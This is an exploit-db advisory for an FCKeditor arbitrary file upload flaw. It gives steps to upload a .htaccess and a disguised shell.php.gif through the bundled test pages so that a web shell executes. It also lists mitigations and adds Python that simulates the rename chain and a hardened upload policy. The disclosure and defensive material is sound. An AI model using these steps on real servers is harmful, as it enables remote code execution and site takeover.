FCKEditor Core – ‘FileManager test.html’ Arbitrary File Upload (2)

  • Author: pentesters.ir
    Date: 2011-08-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17644/
  • In The Name Of GOD 
    [+] Title: FCKeditor (all versions) Arbitrary File Upload Vulnerability
    [+] Date: 2011
    [+] script:http://sourceforge.net/projects/fckeditor/
    [+] Author: pentesters.ir
    [+] Website : WwW.PenTesters.IR
    ---------------------------------------------------------
    1. Create a .htaccess file that tells Apache to run any file whose name contains "_php.gif" as PHP:
    code: 
    <FilesMatch "_php.gif">
    SetHandler application/x-httpd-php
    </FilesMatch>
    
    2. Upload this .htaccess through FCKeditor's bundled upload test pages (demo pages that ship with the package and are frequently left on production sites):
    http://target.com/FCKeditor/editor/filemanager/upload/test.html
    http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
    ----------------------------------------------------------------------------------------------
    3. Upload shell.php.gif through FCKeditor.
    4. After the upload, "shell.php.gif" is stored as "shell_php.gif": with ForceSingleExtension enabled (the shipped default) the connector replaces every dot except the last one with an underscore, so the file passes the extension check as a .gif while its stored name still matches the FilesMatch pattern.
    5. Request http://target.com/anything/shell_php.gif (where "anything" is the directory the connector wrote the upload to).
    6. Apache hands the file to the PHP handler and the shell executes on the server.
    
    Preconditions: the server must be Apache (or compatible) configured to honour .htaccess in the upload directory (AllowOverride FileInfo or All), and the connector must accept a file named .htaccess, which depends on the DeniedExtensions list of the deployed version. Mitigation: remove the test.html pages, keep the connector disabled ($Config['Enabled'] = false in the PHP connector's config.php, the shipped default), and serve the upload directory with overrides and PHP execution switched off.
    ---------------------------------------------------------
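The two name-handling steps the advisory chains together (the connector's dot-to-underscore rename and the unanchored FilesMatch rule), reproduced offline in Python next to a hardened upload-name policy. This is an added example, not code from the advisory or from FCKeditor: the denied-extension list is illustrative, and the rename regex is an assumption that reproduces the shell.php.gif to shell_php.gif behaviour described in step 4.

```python
import re
import secrets

# Illustrative denied list (assumption, not the connector's exact default).
# What matters is that only the LAST extension is compared against it.
DENIED_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "asp", "jsp"}

# Assumption: reproduces the effect of FCKeditor 2.x ForceSingleExtension,
# which replaces every dot except the last one with an underscore.
_INNER_DOTS = re.compile(r"\.(?![^.]*$)")

# The advisory's rule: FilesMatch is an unanchored regex on the basename
# ('.' is a regex metacharacter here, so "_php.gif" also matches "_phpXgif").
FILESMATCH = re.compile(r"_php.gif")


def fck_extension_accepted(filename):
    """Connector-style check: look only at the text after the last dot.
    '.htaccess' yields 'htaccess', 'shell.php.gif' yields 'gif'."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in DENIED_EXTENSIONS


def fck_store_name(filename):
    """Name the connector writes to disk (advisory step 4)."""
    return _INNER_DOTS.sub("_", filename)


def apache_runs_as_php(stored_name):
    """True if the uploaded .htaccess would route this file to the PHP handler."""
    return FILESMATCH.search(stored_name) is not None


def exploit_chain(upload_name):
    """Return (stored name, executes as PHP) for one upload, or raise if rejected."""
    if not fck_extension_accepted(upload_name):
        raise ValueError(f"rejected by extension check: {upload_name!r}")
    stored = fck_store_name(upload_name)
    return stored, apache_runs_as_php(stored)


# Hardened policy: allow-list the last extension, refuse dotfiles and
# multi-dot names outright, and never reuse the client-supplied base name.
ALLOWED_IMAGE_EXT = {"gif", "jpg", "jpeg", "png"}


def hardened_store_name(filename, token=""):
    base, dot, ext = filename.rpartition(".")
    if not dot or not base or base.startswith(".") or "." in base:
        raise ValueError(f"refused name: {filename!r}")
    ext = ext.lower()
    if ext not in ALLOWED_IMAGE_EXT:
        raise ValueError(f"refused extension: {ext!r}")
    # Random server-side name: the attacker no longer controls what FilesMatch sees.
    return f"{token or secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    for name in (".htaccess", "shell.php.gif", "photo.gif"):
        print(name, "->", exploit_chain(name))
        try:
            print("  hardened:", hardened_store_name(name))
        except ValueError as exc:
            print("  hardened:", exc)
```

Running it shows `.htaccess` and `shell.php.gif` both passing the last-extension check, `shell.php.gif` landing on disk as `shell_php.gif`, and only that stored name matching the FilesMatch rule. The hardened policy refuses both attacker names, but a renaming policy on its own is not the fix: once a `.htaccess` can be written into a directory where overrides are honoured, the attacker chooses the pattern, so the upload directory also needs `AllowOverride None` and PHP execution disabled.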